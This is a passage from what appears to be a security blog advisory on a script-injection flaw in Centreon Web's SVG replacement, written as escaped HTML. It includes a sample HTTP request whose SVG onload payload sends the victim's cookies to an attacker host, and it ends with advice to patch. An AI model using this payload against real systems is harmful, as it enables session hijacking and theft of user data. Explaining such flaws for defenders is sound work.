This <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2023-7032-security-flaw-allowing-privilege-escalation-through-untrusted-data-deserialization\/\"  data-wpil-monitor-id=\"47515\">allows a user with elevated privileges<\/a> to inject malicious scripts by replacing the content of an existing SVG. When these scripts are executed, they can lead to a variety of exploits, including <a href=\"https:\/\/www.ameeba.com\/blog\/the-stealthy-tactics-of-ransomware-gangs-unmasking-skitnet-malware-in-data-theft-and-remote-access\/\"  data-wpil-monitor-id=\"48527\">data theft<\/a>, session hijacking, or even full system compromise.<\/p>\n<p><strong>Conceptual Example Code<\/strong><\/p>\n<p>Below, a conceptual example of how this vulnerability could be exploited. The attacker injects <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-24189-memory-corruption-vulnerability-due-to-maliciously-crafted-web-content-in-various-operating-systems\/\"  data-wpil-monitor-id=\"51760\">malicious JavaScript into the SVG content<\/a>.<\/p>\n<pre><code class=\"language-http\">POST \/centreon\/replaceSVG HTTP\/1.1\nHost: target.example.com\nContent-Type: application\/xml\n<svg onload=\"var xhr=new XMLHttpRequest();xhr.open('GET','http:\/\/attacker.com\/steal.php?cookie='+document.cookie,false);xhr.send();\"><\/code><\/pre>\n<p>In this example, the malicious script sends the <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-46827-graylog-open-log-management-platform-user-session-cookie-exposure\/\"  data-wpil-monitor-id=\"47635\">user&#8217;s cookies<\/a> to a server controlled by the attacker, potentially leading to session hijacking.<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>Users of <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-40566-severe-user-session-vulnerability-in-simatic-pcs-neo-products\/\"  data-wpil-monitor-id=\"48853\">Centreon<\/a> Web are strongly advised to apply the vendor patch to fix the vulnerability.
